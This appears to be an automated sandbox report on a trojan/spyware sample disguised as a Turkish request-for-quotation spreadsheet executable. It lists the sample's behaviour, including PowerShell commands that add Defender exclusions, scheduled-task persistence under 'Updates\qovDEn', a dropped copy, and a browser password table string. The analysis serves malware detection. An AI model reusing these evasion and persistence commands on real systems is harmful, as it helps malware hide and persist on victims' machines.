Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, cunKBCp553M1W4qgFC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, cunKBCp553M1W4qgFC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, qB75hHcSQCiCj2fkFb.cs	Security API names: _0020.SetAccessControl
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, qB75hHcSQCiCj2fkFb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, qB75hHcSQCiCj2fkFb.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, qB75hHcSQCiCj2fkFb.cs	Security API names: _0020.SetAccessControl
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, qB75hHcSQCiCj2fkFb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, qB75hHcSQCiCj2fkFb.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/15@3/3

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

File created: C:\Users\user\AppData\Roaming\qovDEn.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Mutant created: \Sessions\1\BaseNamedObjects\xqYiPDFmBgWBL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_03

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003315000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003653000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

File read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\qovDEn.exe C:\Users\user\AppData\Roaming\qovDEn.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process created: C:\Users\user\AppData\Roaming\qovDEn.exe "C:\Users\user\AppData\Roaming\qovDEn.exe"
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Process created: C:\Users\user\AppData\Roaming\qovDEn.exe "C:\Users\user\AppData\Roaming\qovDEn.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
